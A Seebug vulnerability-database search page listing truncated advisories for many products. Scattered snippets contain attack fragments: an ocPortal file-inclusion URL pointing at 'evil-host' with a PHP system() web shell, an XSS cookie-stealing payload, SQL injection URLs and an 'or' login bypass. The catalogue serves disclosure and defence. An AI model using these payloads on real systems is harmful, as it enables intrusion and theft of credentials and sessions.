Lucene search
K
SeebugMost viewed

56796 matches found

seebug.org
seebug.org
added 2006/10/25 12:0 a.m.84 views

Retro64 CR64Loader ActiveX远程缓冲区溢出漏洞

CR64Loader对象是Retro64提供的一个ActiveX控件,用于提供在线游戏。 CR64Loader的实现上存在缓冲区溢出漏洞,如果用户受骗访问了恶意的WEB页面的话,就会触发这个漏洞,导致执行任意指令。 Retro64 CR64Loader 临时解决方法: 为以下CLSID设置kill bit: 288C5F13-7E52-4ADA-A32E-F5BF9D125F99 厂商补丁: Retro64 ------- 我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://retro64.com/...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2021/06/23 12:0 a.m.83 views

IceWarp 反射型XSS (CVE-2020-8512)漏洞

...

4.3CVSS1.2AI score0.14834EPSS
Exploits5
seebug.org
seebug.org
added 2018/07/09 12:0 a.m.83 views

New ceoAnyone Bug Identified in Multiple Crypto Game Smart Contracts (CVE-2018-11329)

Our vulnerability-scanning system at PeckShield has so far discovered several dangerous smart contract vulnerabilities batchOverflow1, proxyOverflow2, transferFlaw3, ownerAnyone4, multiOverflow5, burnOverflow6. These vulnerabilities typically affect various tokens that may be publicly traded in...

5CVSS0.4AI score0.00882EPSS
Exploits1
seebug.org
seebug.org
added 2018/02/24 12:0 a.m.83 views

IE11: Use-after-free in String.lastIndexOf(CVE-2018-0866)

There is a Use-after-free vulnerability in Internet Explorer that could potentially be used for memory disclosure. This was tested on IE11 running on Window 7 64-bit with the latest patches applied. PoC: var vars = new Array2; function main vars0 = new Array1000000; vars1 =...

7.7AI score0.44265EPSS
Exploits4
seebug.org
seebug.org
added 2018/01/10 12:0 a.m.83 views

CPP-Ethereum JSON-RPC Denial Of Service Vulnerabilities(CVE-2017-12119)

Summary An exploitable unhandled exception vulnerability exists in multiple APIs of CPP-Ethereum's JSON-RPC. Specially crafted JSON requests can cause a unhandled exception resulting in denial of service. An attacker can send malicious JSON to trigger this vulnerability. Tested Versions Ethereum...

7.4AI score0.02086EPSS
Exploits2
seebug.org
seebug.org
added 2018/01/10 12:0 a.m.83 views

CPP-Ethereum JSON-RPC admin_addPeer Authorization Bypass Vulnerability(CVE-2017-12112)

Summary An exploitable improper authorization vulnerability exists in adminaddPeer API of cpp-ethereum's JSON-RPC commit 4e1015743b95821849d001618a7ce82c7c073768. A JSON request can cause an access to the restricted functionality resulting in authorization bypass. An attacker can send JSON to...

8.1AI score0.01443EPSS
Exploits2
seebug.org
seebug.org
added 2016/10/25 12:0 a.m.83 views

AVTECH DVR settings without requiring the user to log command execution vulnerability

Set the DVR there exists no user-login command execution vulnerability Search. cgi provides cgiquery function is through the wget function to achieve the HTML request, but because of the parameters did not validate and filter, can be configured through the parameters to achieve root access to...

8.1AI score
Exploits0
seebug.org
seebug.org
added 2014/12/22 12:0 a.m.83 views

致远A8-V5协同管理软件未授权访问(通杀V5,获取系统内各种缓存信息)

简要描述: 致远A8-V5协同管理软件存在未授权访问,可以利用普通用户权限访问system权限页面,获取大量缓存信息,如用户信息。 详细说明: 利用之前提交的漏洞“致远A8-V5协同管理软件日志信息泄露通杀V5”获取到的某弱口令用户对http://a8v51.seeyon.com进行测试,发现致远A8-V5协同管理软件还存在未授权访问,可以利用普通用户权限访问system权限页面,获取大量缓存信息,如2000+用户信息。 漏洞证明: 登录某普通用户 访问 http://a8v51.seeyon.com/seeyon/ctp/sysmgr/monitor/cacheDump.do...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/04 12:0 a.m.83 views

Kerio Control 8.3.1 - SQL盲注漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.83 views

Pligg CMS (story.php?id) 1.0.4 - SQL Injection Vulnerability

No description provided by source. / ! Pligg CMS story.php?id SQL Injection Vulnerability ! Author : Don Tukulesto [email protected] ! Homepage: http://indonesiancoder.com ! Date : Tue, April 27, 2010 ! Tune in : http://antisecradio.fm choose your weapon / Software Information Vendor :...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.83 views

GLPI install.php Remote Command Execution

No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit3...

6.8CVSS0.3AI score0.07855EPSS
Exploits11
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.83 views

4images 1.7.1 - Remote SQL Injection Vulnerability

No description provided by source. Exploit Title: 4images 1.7.1 Remote SQL Injection Vulnerability Date: 20-12-2009 Author: Master Mind Version: 1.7.1 CVE : N/A ============================================================= Script Name : 4images 1.7.1 Language : php Author : Master Mind Home :...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.83 views

Xxasp 3.3.2 - SQL Injection

Securitylab.ir Application Info: Name: Xxasp Version: 3.3.2 Discoverd By: [email protected] Website: http://securitylab.ir Contacts: adminatsecuritylab.ir & info@securitylabdotir ===========================================================...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.83 views

Eyeland Studio Inc. SQL Injection Vulnerability

No description provided by source. Title: Eyeland Studio Inc. SQL Injection Vulnerability Version: 2.0 Author: Mr.P3rfekT Software Site:http://www.eyeland.com/ Tested on Lunix CVE : N/A Home :www.realmadridsy.com & www.v4-team.com/cc Founded By Mr.P3rfekT Dork :Eyeland Studio Inc. All Rights...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.83 views

Microsoft Windows OLE Object File Handling Remote Code Execution

No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit3...

9.3CVSS6.4AI score0.71722EPSS
Exploits11
seebug.org
seebug.org
added 2014/05/30 12:0 a.m.83 views

逐浪CMSSQL注入及绕过

简要描述: 官网及demo站点演示,绕过注入过滤。 详细说明: 这个点: http://www.zoomla.cn/Search/SearchList.aspx?node=1%20aNd%20@@version%3E0&keyword=2013 http://demo.zoomla.cn/Search/SearchList.aspx?node=1%20aNd%20@@version%3E0&keyword=2013 这样一下:...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/04/21 12:0 a.m.83 views

Oracle Session Monitor Suite OpenSSL TLS心跳信息泄漏漏洞

CVE ID:CVE-2014-0160 Oracle Session Monitor Suite是一款Oracle公司推出的会话监视套件。 Oracle Session Monitor Suite所绑定的OpenSSL存在安全漏洞,OpenSSL处理TLS”心跳“扩展存在一个边界错误,允许攻击者利用漏洞获取64k大小的已链接客户端或服务器的内存内容。内存信息可包括私钥,用户名密码等。 0 Oracle Session Monitor Suite 3.x Oracle Session Monitor Suite 3.3.40.2.1版本已修复该漏洞,建议用户下载使用:...

5CVSS0.2AI score0.99999EPSS
Exploits88
seebug.org
seebug.org
added 2014/04/16 12:0 a.m.83 views

Kerio Control OpenSSL TLS心跳信息泄漏漏洞

CVE ID:CVE-2014-0160 Kerio Control是一款防火墙系统。 Kerio Control所绑定的OpenSSL存在安全漏洞,OpenSSL处理TLS”心跳“扩展存在一个边界错误,允许攻击者利用漏洞获取64k大小的已链接客户端或服务器的内存内容。内存信息可包括私钥,用户名密码等。 0 Kerio Control 8.x Kerio Control 8.2.2 patch2已经修复该漏洞,建议用户下载使用: http://www.kerio.com...

5CVSS0.6AI score0.99999EPSS
Exploits88
seebug.org
seebug.org
added 2013/06/11 12:0 a.m.83 views

Linux Kernel 'b43'无线驱动本地特权提升漏洞

CVE ID:CVE-2013-2852 Linux是一款开源的操作系统。 Linux b43无线驱动存在安全问题,允许本地攻击者利用漏洞提升权限。 b43无线驱动drivers/net/wireless/b43/main.c b43requestfirmware函数可使用"fwpostfix"模块参数来更改文件名用于获取固件,如果此文件没有找到的情况下,错误消息会把文件名以格式串处理,这可导致应用程序崩溃或可以从uid-0提权到ring-0。 0 Linux Kernel 3.9.4 厂商解决方案 用户可参考如下厂商提供的安全公告获得补丁信息:...

6.9CVSS0.01022EPSS
Exploits1
seebug.org
seebug.org
added 2013/01/16 12:0 a.m.83 views

Oracle Java Runtime Environment 未明远程代码执行漏洞(CVE-2012-3174)

Bugtraq ID:57312 CVE ID:CVE-2012-3174 Oracle Java Runtime Environment是一款为JAVA应用程序提供可靠的运行环境的解决方案 Oracle Java Runtime Environment存在一个未明安全漏洞,允许攻击者构建恶意WEB页,诱使用户解析,可以应用程序上下文执行任意代码 0 Sun JRE Windows Production Release 1.7.04 Sun JRE Windows Production Release 1.7.02 Sun JRE Solaris Production Release...

10CVSS1AI score0.97612EPSS
Exploits38
seebug.org
seebug.org
added 2010/06/04 12:0 a.m.83 views

OpenSSL CMS结构处理内存破坏漏洞

BUGTRAQ ID: 40502 CVE ID: CVE-2010-0742 OpenSSL是一种开放源码的SSL实现,用来实现网络通信的高强度加密,现在被广泛地用于各种网络应用程序中。 OpenSSL没有正确地处理加密消息句法(CMS)结构,远程攻击者可以通过包含有OriginatorInfo元素的特制CMS结构触发无效内存地址写入或双重释放,导致执行任意代码。 OpenSSL 1.0.0 OpenSSL 0.9.8 厂商补丁: OpenSSL Project --------------- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:...

7.5CVSS8.6AI score0.07834EPSS
Exploits2
seebug.org
seebug.org
added 2010/03/21 12:0 a.m.83 views

Linux Kernel ip6_dst_lookup_tail()函数远程拒绝服务漏洞

CVECAN ID: CVE-2010-0437 Linux Kernel是开放源码操作系统Linux所使用的内核。 Linux Kernel的ip6dstlookuptail函数中存在空指针引用漏洞。本地网络上的攻击者可以通过向目标系统发送IPv6通讯来触发这个漏洞,如果接收到IPv6报文时目标系统上dst-neighbour为空,就会导致系统崩溃 Linux kernel 2.6.x 厂商补丁: Linux ----- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:...

7.8CVSS0.12426EPSS
Exploits2
seebug.org
seebug.org
added 2009/10/08 12:0 a.m.83 views

Riorey RIOS Hardcoded Password Vulnerability 4.7.0

No description provided by source. Severity: High Full root access to the device Date: 07 October 2009 Versions Affected: RIOS 4.6.6 , 4.7.0 possibly others Discovered on: 25 July 2009 Vendor URL: www.riorey.com Author: Marek Kroemeke Overview: Riorey DDoS mitigation appliences www.riorey.com are...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2009/08/19 12:0 a.m.83 views

Linux Kernel 2.x sock_sendpage() Local Root Exploit (Android Edition)

No description provided by source. Source for exploiting CVE-2009-2692 on Android; Hole is closed in Android kernels released August 2009 or later. orig: http://zenthought.org/content/file/android-root-2009-08-16-source back: http://milw0rm.com/sploits/android-root-20090816.tar.gz...

7.2CVSS0.4AI score0.14749EPSS
Exploits17
seebug.org
seebug.org
added 2008/11/11 12:0 a.m.83 views

FREEsimplePHPguestbook (guestbook.php) Remote Code Execution Vulnerability

No description provided by source. | | | \ \ \ / / / \ / | / | / | | | | | | \ V / / \ | | | | | | | | | | | / \ | || | | | | | || || \ || // \ | | | FREEsimplePHPguestbook guestbook.php Remote Code Execution Vulnerability Get Script : http://www.sanusart.com/php/FREEsimplePHPguestbook.zip...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2008/06/28 12:0 a.m.83 views

Ruby WEBrick远程目录遍历漏洞

CVECAN ID: CVE-2008-1891 Ruby是一种功能强大的面向对象的脚本语言。 WEBrick是Ruby中内嵌的HTTP服务器程序库。WEBrick组件存在目录遍历漏洞,如果服务器使用的是NTFS或FAT文件系统的话,远程攻击者就可以通过在向使用WEBrick::HTTPServlet::FileHandler或WEBrick::HTTPServer.new的应用所提交的URI请求结尾附加“+”、“%2b”、“.”、“%2e”或“%20”字符执行目录遍历攻击,导致读取任意CGI文件。 Yukihiro Matsumoto Ruby 1.9.x Yukihiro...

5CVSS6.4AI score0.02813EPSS
Exploits1
seebug.org
seebug.org
added 2007/11/02 12:0 a.m.83 views

动易网站管理系统vote.asp页面存在SQL注入漏洞

动易网站管理系统是一个采用 ASP 和 MSSQL 等其他多种数据库构建的高效网站内容管理解决方案产品。 vote.asp调用了动易组件PESite.ShowVote,此组件VoteOption参数过滤不严,导致可以进行mssql注入 但是其语句里面过滤了-- ;等字符,又是一个UPDATE形的注入,有一定的限制。但是其过滤的顺序不对。有导致mssql的注释符号--可以进入语句 PowerEasy CMS SP6 071030以下版本 更新动易组件(需要管理员的权限才能更新)。 不需要投票功能的用户,删除此文件。...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/06/26 12:0 a.m.83 views

Calendarix SQL注入漏洞

Calendarix是一款基于PHP的WEB应用程序。 Calendarix不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞进行SQL注入攻击获得敏感信息。 问题是由于'index.php'脚本对用户提交的'month'和'year'参数缺少过滤,提交恶意SQL查询作为参数数据,可导致应用程序处理时更改原来的SQL逻辑,攻击者可以获得敏感信息或者操作数据库。 Calendarix 0.7.20070307 目前没有解决方案提供: http://www.calendarix.com/ http://www.example.com/calendar.php?month=' UNION...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/06/10 12:0 a.m.83 views

新云 3.0.0.518 SQL注入

新云网站管理系统是一个采用ASP和MSSQL等其他多种数据库生成静态页面构建的高效网站解决方案。 先看const.asp的GetUserTodayInfo过程。 QUOTE: Lastlogin = Request.Cookies"newaspnet""LastTime" UserDayInfo = Request.Cookies"newaspnet""UserToday" If DateDiff"d",LastLogin,Now0 Then ……………… UserDayInfo = "0,0,0,0,0,0" Response.Cookies"newaspnet""UserToday"...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/05/05 12:0 a.m.83 views

Multiple vendors ZOO file decompression Infinite Loop DoS PoC

No description provided by source. / Exploit for the vulnerability: Multiple vendors ZOO file decompression infinite loop DoS coded by Jean-Sébastien Guay-Leroux September 2006 / include stdio.h include stdlib.h include string.h // Structure of a ZOO header define ZOOHEADERSIZE 0x0000002a define...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/04/19 12:0 a.m.83 views

Macrovision InstallAnywhere绕过口令和序列号认证漏洞

InstallAnywhere是领先的多平台安装解决方案,提供完整的安装工具套件,以生成功能全面、灵活的安装程序。 InstallAnywhere在处理软件安装时存在竞争条件漏洞,本地攻击者可能利用此漏洞获取应用的非授权访问。...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2006/12/20 12:0 a.m.83 views

Microsoft Project Server 2003 PDSRequest.ASP XML请求信息泄露漏洞

Microsoft Project server 2003实现部分瘦客户端功能,瘦客户端使用XML请求对HTTPS服务进行对话。 这些请求其中一个返回用于访问SQL数据库的MSProjectUser帐户的用户名和密码信息: -------------------------------------------------------------- POST http://SERVER/projectserver/logon/pdsrequest.asp HTTP/1.0 Accept: / Accept-Language: en-nz Pragma: no-cache Host:...

7AI score
Exploits0
seebug.org
seebug.org
added 2004/10/13 12:0 a.m.83 views

ocPortal 1.0.3 Remote File Inclusion

No description provided by source. http://localhost/ocp-103/index.php?reqpath=http ://evil-host/ On your evil host you must put scipt funcs.php. Example of funcs.php if your host doesn't support php. ?php $com = $GET"com"; system "$com"; ? Example of funcs.php if your host support php. ?php echo...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2021/05/07 12:0 a.m.82 views

Microsoft Exchange Server远程执行代码漏洞(CVE-2021-28482)

...

9CVSS9.2AI score0.83337EPSS
Exploits4
seebug.org
seebug.org
added 2018/05/08 12:0 a.m.82 views

Multiple remote vulnerabilities (RCE, bof) in Nuuo NVR and NETGEAR Surveillance

Multiple vulnerabilities in NUUO NVRmini2 / NVRsolo / Crystal devices and NETGEAR ReadyNAS Surveillance application Discovered by Pedro Ribeiro [email protected], Agile Information Security http://www.agileinfosec.co.uk/ Disclosure: 04/08/2016 / Last updated: 05/08/2016 Background on the affected...

10CVSS9.5AI score0.9461EPSS
Exploits15
seebug.org
seebug.org
added 2017/09/14 12:0 a.m.82 views

ProcessMaker Enterprise Core Code Execution Vulnerability(CVE-2016-9045)

Summary A code execution vulnerability exists in ProcessMarker Enterprise Core 3.0.1.7-community. A specially crafted web request can cause unsafe deserialization potentially resulting in PHP code being executed. An attacker can send a crafted web parameter to trigger this vulnerability. Tested...

8.9AI score0.02211EPSS
Exploits2
seebug.org
seebug.org
added 2017/03/22 12:0 a.m.82 views

MetInfo5.3.15 存储型 XSS 漏洞(CVE-2017-6878)

Vulnerability details: To modify, add a message in problem position insert JavaScript test code Then the background access to relevant pages, or other users access to the front desk page will make the attack code is executed. E-mail:callarice 163 com DBAppSecurity Ltd www.dbappsecurity.com.cn POC...

3.5CVSS6.2AI score0.00959EPSS
Exploits3
seebug.org
seebug.org
added 2016/06/16 12:0 a.m.82 views

Struts2 remote code execution vulnerability S2-037)

Source link: http://drops.wooyun.org/papers/16875?utmsource=tuicool&utmmedium=referral 0x01 vulnerability review According to the official description Obviously there are two key points: the first is the REST Plugin,the other is Dynamic Method Invocation is enabled. That opens the dynamic method...

7.5CVSS9.8AI score0.17171EPSS
Exploits2
seebug.org
seebug.org
added 2016/01/09 12:0 a.m.82 views

Beescms V4.0 在文件mx_form.php处存在后台登陆绕过漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2015/10/12 12:0 a.m.82 views

蝉知CMS注入漏洞官网演示

简要描述: 蝉知CMS注入漏洞一枚,官网演示 详细说明: 1.蝉知的整体防注入还是真心做得很不错的,看了很久,都没找到什么可以利用的点。但是人无完人,程序员也总有疏忽的时候,这个时候,终于被我发现了。首先定位到漏洞system/module/message/model.php文件。 public function getByObject$type, $objectType, $objectID, $pager = null $userMessages = $this-cookie-cmts; $userMessages = trim$userMessages, ',';...

7AI score
Exploits0
seebug.org
seebug.org
added 2015/09/02 12:0 a.m.82 views

PhpWiki 1.5.4 Cross Site Scripting / Local File Inclusion

1/ 跨站点脚本漏洞跨站点脚本漏洞允许未经身份验证的远程用户通过GET或POST 参数将任意网页脚本注入代码。Example url:http://192.168.0.10/phpwiki/index.php?pagename=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C!--Example request:POST /phpwiki/index.php/UserPreferences HTTP/1.1Host: 192.168.0.10User-Agent: Mozilla/5.0...

6.9AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.82 views

PHP Hashtables Denial of Service

No description provided by source. Exploit Title: CVE-2011-4885 PHP Hashtables Denial of Service Exploit Date: 1/1/12 Author: infodox Software Link: php.net Version: 5.3. Tested on: Linux CVE : CVE-2011-4885 Exploit Download -- http://infodox.co.cc/Downloads/phpdos.txt ?php / PHP 5.3. Hash...

5CVSS6.7AI score0.83911EPSS
Exploits15
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.82 views

toutvirtual virtualiq pro 3.2 - Multiple Vulnerabilities

No description provided by source. &redirectSecure Network - Security Research Advisory Vuln name: ToutVirtual VirtualIQ Pro Multiple Vulnerabilities Systems affected: ToutVirtual VirtualIQ Professional 3.2 build 7882 Systems not affected: -- Severity: High Local/Remote: Remote Vendor URL:...

5CVSS7.6AI score0.99708EPSS
Exploits23
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.82 views

DA Mailing List System 2 - Multiple Vulnerabilities

No description provided by source. DA Mailing List System V2 Remote Admin Login Exploit Author : Phenom Dork: DA Mailing List System V2 Powered by DigitalArakan.Net Version : 2 Exploit : 1- http://server/path/admincp.asp 2- login with admin as user name and 'or' as pas...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/06/10 12:0 a.m.82 views

Veryide 2.1 /library.php SQL注入漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/05/09 12:0 a.m.82 views

逐浪CMS一个漏洞的各种拿Shell姿势(系统环境限制)

简要描述: 文件目录随意保存影响版本:包含此文件的版本均受影响 拿Shell影响版本:包含此文件的版本均受影响 仅是(IIS6.0) 依官网最新版本为测试对象 Zoomla!CMS2x1.5 详细说明: 首先还是问题出现的部分 文件 None Dir则为目录参数 那么可以简单的构造成 http://192.168.10.19:9992/User/UploadHandler.ashx?content=aaaaaaaaa&Dir=.asp 上传得到SHell 地址为Domain/UploadFiles/用户名/.asp/文件名 图 另外文件可以随意保存...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/04/17 12:0 a.m.82 views

Apache Syncope特制Commons JEXL表达式远程代码执行漏洞

CVE ID:CVE-2014-0111 Apache Syncope是用在企业环境的数字身份管理,在JEE技术的实施和Apache 2.0许可下发布的开源系统。 Apache Syncope处理特制的Apache Commons JEXL表达式存在安全漏洞,允许通过验证的远程攻击者通过运行Apache Syncope core的JEE container来执行任意代码。 0 Apache Syncope 1.0.0 Apache Syncope 1.0.8 Apache Syncope 1.1.0 Apache Syncope 1.1.6 Apache Syncope 1.0.9,...

6.5CVSS6.6AI score0.03284EPSS
Exploits1
seebug.org
seebug.org
added 2014/04/03 12:0 a.m.82 views

Apache Xalan-Java Library安全绕过漏洞

Bugtraq ID:66397 CVE ID:CVE-2014-0107 Apache Xalan-Java是一个使用Java和C++来实现XSLT库的项目。 攻击者可以利用这个问题来绕过安全限制,并执行未经授权的操作。这可能有助于发动进一步的攻击。 0 Apache Software Foundation Xalan-java 2.7 目前厂商已经发布了升级补丁以修复漏洞,请下载使用: http://xml.apache.org/xalan-j/...

7.5CVSS0.5AI score0.13809EPSS
Exploits2
seebug.org
seebug.org
added 2014/02/21 12:0 a.m.82 views

程氏舞曲CMS最新版存储型XSS(已劫持到官网管理员)

简要描述: 通过最新版存储型XSS,已成功劫持到管理员cookie,并成功登录到官方演示站后台 P.S.管理员用的电脑是:土豪MAC! 详细说明: 在会员中心-设置-昵称修改,发现已经过滤了,但是发现只过滤了一层,于是将写成ipt,保存后发现xss成功了 于是X入了这条语句,Jim叔叔ipt src=http://126.am/SlQop0ript,发现文本框有长度限制,但是只是前台的一个限制,修改了一下html提交保存成功! 跳转到会员首页查看源代码 然后我添加了一首歌,在管理员审核的时候就劫持到了管理员的cookie 漏洞证明: 伪造成管理员的cookie后,成功登入歌曲管理后台...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2012/11/30 12:0 a.m.82 views

Samsung 打印机固件管理账号后门

BUGTRAQ ID: 56692 CVECAN ID: CVE-2012-4964 Samsung是韩国三星电子,成立于1969年。 Samsung打印机及某些三星产的Dell打印机包含硬编码的完全读写权限的SNMP community string,即使在打印机管理程序中禁用SNMP,此字符串也是有效的,导致远程攻击者可完全控制受影响设备。2012年10月31日后的发布的模块不受此漏洞的影响。 利用该漏洞,一个远端的未授权的攻击者可以1 以管理权限访问受影响设备 (2)修改受影响设备的配置、访问敏感资源 (3) 代码执行 有报告称已有发布工具利用该漏洞。 0 Samsung...

7.5CVSS6.4AI score0.08015EPSS
Exploits1
Total number of security vulnerabilities5000